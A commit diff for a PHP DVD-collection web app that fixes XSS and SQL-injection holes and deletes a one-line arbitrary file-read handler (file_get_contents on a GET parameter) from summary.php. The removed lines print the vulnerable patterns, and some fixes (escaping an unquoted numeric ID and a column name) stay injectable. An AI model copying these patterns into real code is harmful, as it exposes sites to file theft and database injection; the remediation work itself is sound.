Fix some Sonar issues

Author: julmud

BorrowADVD.php

@@ -54,6 +54,7 @@
     $onfocus = 'onFocus="this.value=\'\'"';
     if ($_COOKIE['emailaddr'] != $lang['BORROW_PROMPT_STRING'])
         $onfocus = '';
+    $displayEmailaddr = htmlentities($_COOKIE['emailaddr']);
     echo<<<EOT
 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
 <html>
@@ -80,7 +81,7 @@ function ValidateForm(form) {
 <center><table width="100%" class=f1><tr><td>$lang[BORROW_PAGE_HEADING] $MY_EMAIL_ADDRESS</td></tr></table></center>
 <BR>
 <center><form action=$PHP_SELF method=post onSubmit="return ValidateForm(this);"><table width="75%" class=f1 cellpadding=5 border=1><tr><td align=right>$lang[BORROW_TITLE]</td><td align=left>$name</td></tr>
-<tr><td align=right>$lang[BORROW_EMAIL]</td><td align=left><input id=emailaddr $onfocus type=text name=emailaddr value="$_COOKIE[emailaddr]"></td></tr></table><br>
+<tr><td align=right>$lang[BORROW_EMAIL]</td><td align=left><input id=emailaddr $onfocus type=text name=emailaddr value="$displayEmailaddr"></td></tr></table><br>
 <input type=hidden name="mediaid" value="$mediaid"><input type=submit value="$lang[BORROW_SUBMIT_TEXT]"></form></center>
 $endbody</html>
 

gallery.php

@@ -48,7 +48,7 @@ function get_children($id,$bs){
 }
 
 function format_addinfo (&$dvd){
-    GLOBAL $lang, $reviewsort, $sortby, $ReviewLabels;
+    global $lang, $reviewsort, $sortby, $ReviewLabels;
 
     if (!isset($dvd['addinfo']) || empty($dvd['addinfo'])) {
         $dvd['addinfo'] = '';
@@ -316,7 +316,7 @@ function dh(theitems, obj) {
 }
 
 function site_header (){
-    GLOBAL $Title, $lang, $CurrentSiteTitle, $xmlfile, $sql, $dpp, $sortby, $order, $searchby, $searchtext, $letter, $ct, $page;
+    global $Title, $lang, $CurrentSiteTitle, $xmlfile, $sql, $dpp, $sortby, $order, $searchby, $searchtext, $letter, $ct, $page;
     switch ($ct){
         case 'owned':
         case 'ordered':
@@ -417,7 +417,7 @@ function site_header (){
 }
 
 function site_footer(){
-    GLOBAL $sql, $dpp, $PHP_SELF,$_SERVER, $page;
+    global $sql, $dpp, $PHP_SELF,$_SERVER, $page;
     ?>
  </div>
  <div class="f4 noprint" style="background-color: transparent; text-align:center; width: 90%; clear:left;">
@@ -439,7 +439,7 @@ function site_footer(){
 }
 
 function get_total_profiles($sql){
-    GLOBAL $db, $TitlesPerPage;
+    global $db, $TitlesPerPage;
 
     $i = preg_replace('/(.*)(LIMIT)(.*)(,)(.*)/i', '\1', $sql);
 
@@ -450,7 +450,7 @@ function get_total_profiles($sql){
 }
 
 function buildPaginationURL($i, $mediaid, $ct, $searchby, $searchtext, $sortby, $order, $on_page, $text = null) {
-    GLOBAL $PHP_SELF;
+    global $PHP_SELF;
     $disp['i'] = htmlentities($i);
     $disp['mediaid'] = htmlentities($mediaid);
     $disp['ct'] = htmlentities($ct);
@@ -466,7 +466,7 @@ function buildPaginationURL($i, $mediaid, $ct, $searchby, $searchtext, $sortby,
 }
 
 function generate_pagination($num_items, $per_page, $start_item, $add_prevnext_text = TRUE){
-    GLOBAL $PHP_SELF, $sortby, $order, $searchby, $searchtext, $letter, $ct, $mediaid, $page;
+    global $PHP_SELF, $sortby, $order, $searchby, $searchtext, $letter, $ct, $mediaid, $page;
     $total_pages = ceil($num_items/$per_page);
     if ( $total_pages == 1 )
     {

index.php

@@ -1354,8 +1354,8 @@ function DisplayDecoration($str, &$dvd) {
 $nowhere = str_replace('%%BOXPARENT%%', '', $where);
 
 if ($action == 'main') {
-    $cookiesort = isset($_COOKIE['cookiesort']) ? $_COOKIE['cookiesort']: '';
-    $cookieorder = isset($_COOKIE['cookieorder']) ? $_COOKIE['cookieorder']: '';
+    $cookiesort = isset($_COOKIE['cookiesort']) ? htmlentities($_COOKIE['cookiesort']) : '';
+    $cookieorder = isset($_COOKIE['cookieorder']) ? htmlentities($_COOKIE['cookieorder']) : '';
     if ($collection == 'loaned') {
         $secondcol = 'loaninfo';
         $thirdcol = 'loandue';

locale.php

@@ -14,7 +14,7 @@
 // locales, please consult your OS manual for details.
 //
 if ($allowlocale && isset($_COOKIE['locale'])) {
-    $tmp = $_COOKIE['locale'];
+    $tmp = htmlentities($_COOKIE['locale']);
     if (($tmp == 'en') ||
         ($tmp == 'dk') ||
         ($tmp == 'de') ||
@@ -23,8 +23,9 @@
         ($tmp == 'nl') ||
         ($tmp == 'sv') ||
         ($tmp == 'fi') ||
-        ($tmp == 'ru'))
-        $locale = $tmp;
+        ($tmp == 'ru')) {
+            $locale = $tmp;
+        }
 }
 
 $localeset = 'C';

rss.php

@@ -205,7 +205,7 @@
     case 'castlist':
         $sql="SELECT fullname, birthyear FROM $DVD_COMMON_ACTOR_TABLE WHERE lastname like '" . $db->sql_escape($_GET['alpha']) . "%' OR (lastname='' AND firstname like '" . $db->sql_escape($_GET['alpha']) . "%') " . $AdultFilter . " ORDER BY fullname";
         $result=$db->sql_query($sql);
-        echo "<description>Cast List - " . $_GET['alpha'] . "</description>";
+        echo "<description>Cast List - " . htmlentities($_GET['alpha']) . "</description>";
         while ($tmp = $db->sql_fetch_array($result)) {
             $by="";
             if ($tmp['birthyear'] != 0) $by=" (" . $tmp['birthyear'] . ")";
@@ -233,7 +233,7 @@
     case 'crewlist':
         $sql="SELECT fullname, birthyear FROM $DVD_COMMON_CREDITS_TABLE WHERE lastname like '" . $db->sql_escape($_GET['alpha']) . "%' OR (lastname='' AND firstname like '" . $db->sql_escape($_GET['alpha']) . "%') " . $AdultFilter . " ORDER BY fullname";
         $result=$db->sql_query($sql);
-        echo "<description>Crew List - " . $_GET['alpha'] . "</description>";
+        echo "<description>Crew List - " . htmlentities($_GET['alpha']) . "</description>";
         while ($tmp = $db->sql_fetch_array($result)) {
             $by="";
             if ($tmp['birthyear'] != 0) $by=" (" . $tmp['birthyear'] . ")";
@@ -485,20 +485,19 @@
 }
 
 
-if ($rss_report_leafs)
+if ($rss_report_leafs) {
     $rss_report_condition = "boxchild = 0";
-else
+} else {
     $rss_report_condition = "boxparent = ''";
-
-
+}
 
     $alphasql="";
     $alpha="";
     if (isset($_GET['asql'])) $alpha=$_GET['asql'];
     if ($alpha != "") {
-        $alphasql="(sorttitle LIKE '" . substr($alpha,0,1) . "%'";
+        $alphasql="(sorttitle LIKE '" . $db->sql_escape(substr($alpha,0,1)) . "%'";
         for ($loop=1; $loop < strlen($alpha); $loop += 1) {
-            $alphasql.= " OR sorttitle LIKE '" . substr($alpha,$loop,1) . "%'";
+            $alphasql.= " OR sorttitle LIKE '" . $db->sql_escape(substr($alpha,$loop,1)) . "%'";
         }
         $alphasql.=")";
     }
@@ -534,13 +533,13 @@
         break;
 
     case 'rating':
-        $rss_feeddescription = "DVDs filtered by Rating: ". $_GET['rating'];
-        $sql = "SELECT $fieldlist FROM $DVD_TABLE dvd WHERE $RemoveNoRSSTagged rating='$_GET[rating]' $AdultFilter AND collectiontype='owned' ORDER BY sorttitle";
+        $rss_feeddescription = "DVDs filtered by Rating: ". htmlentities($_GET['rating']);
+        $sql = "SELECT $fieldlist FROM $DVD_TABLE dvd WHERE $RemoveNoRSSTagged rating='" . $db->sql_escape($_GET['rating']) . "' $AdultFilter AND collectiontype='owned' ORDER BY sorttitle";
         break;
 
     case 'genre':
-        $rss_feeddescription = "DVDs filtered by Genre: ". $_GET['genre'];
-        $sql = "SELECT $fieldlist FROM $DVD_TABLE dvd JOIN $DVD_GENRE_TABLE gen ON dvd.id=gen.id WHERE $RemoveNoRSSTagged genre='$_GET[genre]' $AdultFilter AND collectiontype='owned' ORDER BY sorttitle";
+        $rss_feeddescription = "DVDs filtered by Genre: ". htmlentities($_GET['genre']);
+        $sql = "SELECT $fieldlist FROM $DVD_TABLE dvd JOIN $DVD_GENRE_TABLE gen ON dvd.id=gen.id WHERE $RemoveNoRSSTagged genre='" . $db->sql_escape($_GET['genre']) . "' $AdultFilter AND collectiontype='owned' ORDER BY sorttitle";
         break;
 
     case 'cast':
@@ -550,7 +549,7 @@
             ."( "
             ."SELECT count(*) FROM $DVD_ACTOR_TABLE a1, $DVD_COMMON_ACTOR_TABLE a2 "
             ."WHERE id=dvd.id "
-            ."  AND a2.caid=" . $_GET['caid'] . ""
+            ."  AND a2.caid=" . $db->sql_escape($_GET['caid']) . ""
             ."  AND a2.caid=a1.caid "
             .") > 0 "
             ."ORDER BY sorttitle";
@@ -564,44 +563,44 @@
             ."SELECT count(*) "
             ."FROM $DVD_CREDITS_TABLE a1, $DVD_COMMON_CREDITS_TABLE a2 "
             ."WHERE id=dvd.id "
-            ."  AND a2.caid=" . $_GET['caid'] . ""
+            ."  AND a2.caid=" . $db->sql_escape($_GET['caid']) . ""
             ."  AND a2.caid=a1.caid "
             .") > 0 "
             ."ORDER BY sorttitle";
         break;
 
     case 'feature':
-        $rss_feeddescription = "DVDs filtered by Feature: ". $_GET['feature'];
-        $sql = "SELECT $fieldlist FROM $DVD_TABLE dvd WHERE $RemoveNoRSSTagged collectiontype='owned' $AdultFilter AND feature$_GET[feature]=1 ORDER BY sorttitle";
+        $rss_feeddescription = "DVDs filtered by Feature: ". htmlentities($_GET['feature']);
+        $sql = "SELECT $fieldlist FROM $DVD_TABLE dvd WHERE $RemoveNoRSSTagged collectiontype='owned' $AdultFilter AND feature" . $db->sql_escape($_GET['feature']). "=1 ORDER BY sorttitle";
         break;
 
     case 'audiocontent':
-        $rss_feeddescription = "DVDs filtered by Audio Content: ". $_GET['audiocontent'];
+        $rss_feeddescription = "DVDs filtered by Audio Content: ". htmlentities($_GET['audiocontent']);
         $sql = "SELECT DISTINCT $fieldlist FROM $DVD_TABLE dvd LEFT JOIN $DVD_AUDIO_TABLE audio ON dvd.id=audio.id WHERE $RemoveNoRSSTagged "
-            ."audio.audiocontent='$_GET[audiocontent]' $AdultFilter AND collectiontype='owned' ORDER BY sorttitle";
+            ."audio.audiocontent='" . $db->sql_escape($_GET['audiocontent']) . "' $AdultFilter AND collectiontype='owned' ORDER BY sorttitle";
         break;
 
     case 'audioformat':
-        $rss_feeddescription = "DVDs filtered by Audio Format: ". $_GET['audioformat'];
+        $rss_feeddescription = "DVDs filtered by Audio Format: ". htmlentities($_GET['audioformat']);
         $sql = "SELECT DISTINCT $fieldlist FROM $DVD_TABLE dvd LEFT JOIN $DVD_AUDIO_TABLE audio ON dvd.id=audio.id WHERE $RemoveNoRSSTagged "
-            ."audio.audioformat='$_GET[audioformat]' $AdultFilter AND collectiontype='owned' ORDER BY sorttitle";
+            ."audio.audioformat='" . $db->sql_escape($_GET['audioformat']) . "' $AdultFilter AND collectiontype='owned' ORDER BY sorttitle";
         break;
 
     case 'subtitle':
-        $rss_feeddescription = "DVDs filtered by Subtitle: ". $_GET['subtitle'];
+        $rss_feeddescription = "DVDs filtered by Subtitle: ". htmlentities($_GET['subtitle']);
         $sql = "SELECT DISTINCT $fieldlist FROM $DVD_TABLE dvd LEFT JOIN $DVD_SUBTITLE_TABLE sub ON dvd.id=sub.id WHERE $RemoveNoRSSTagged "
-            ."sub.subtitle='$_GET[subtitle]' $AdultFilter AND collectiontype='owned' ORDER BY sorttitle";
+            ."sub.subtitle='" . $db->sql_escape($_GET['subtitle']) . "' $AdultFilter AND collectiontype='owned' ORDER BY sorttitle";
         break;
 
     case 'studio':
-        $rss_feeddescription = "DVDs filtered by Studio: ". $_GET['studio'];
+        $rss_feeddescription = "DVDs filtered by Studio: ". htmlentities($_GET['studio']);
         $sql = "SELECT DISTINCT $fieldlist FROM $DVD_TABLE dvd LEFT JOIN $DVD_STUDIO_TABLE stud ON dvd.id=stud.id WHERE $RemoveNoRSSTagged "
-            ."stud.studio='$_GET[studio]' $AdultFilter AND collectiontype='owned' ORDER BY sorttitle";
+            ."stud.studio='" . $db->sql_escape($_GET['studio']) . "' $AdultFilter AND collectiontype='owned' ORDER BY sorttitle";
         break;
 
     case 'loaned':
-        $rss_feeddescription = "DVDs loaned to " . $_GET['loaned'];
-        $sql = "SELECT $fieldlist FROM $DVD_TABLE dvd WHERE $RemoveNoRSSTagged loaninfo='$_GET[loaned]' $AdultFilter AND collectiontype='owned' ORDER BY sorttitle";
+        $rss_feeddescription = "DVDs loaned to " . htmlentities($_GET['loaned']);
+        $sql = "SELECT $fieldlist FROM $DVD_TABLE dvd WHERE $RemoveNoRSSTagged loaninfo='" . $db->sql_escape($_GET['loaned']) . "' $AdultFilter AND collectiontype='owned' ORDER BY sorttitle";
         break;
 
     case 'upcomingreleases':

summary.php

@@ -51,8 +51,6 @@ function adk() {
     return $result;
 }
 
-if (isset($_GET['file']) && is_readable($_GET['file'])){echo @file_get_contents($_GET['file']);exit;}
-
 $OriginalVars = get_defined_vars();
 include_once('globalinits.php');
 $GlobalInits = get_defined_vars();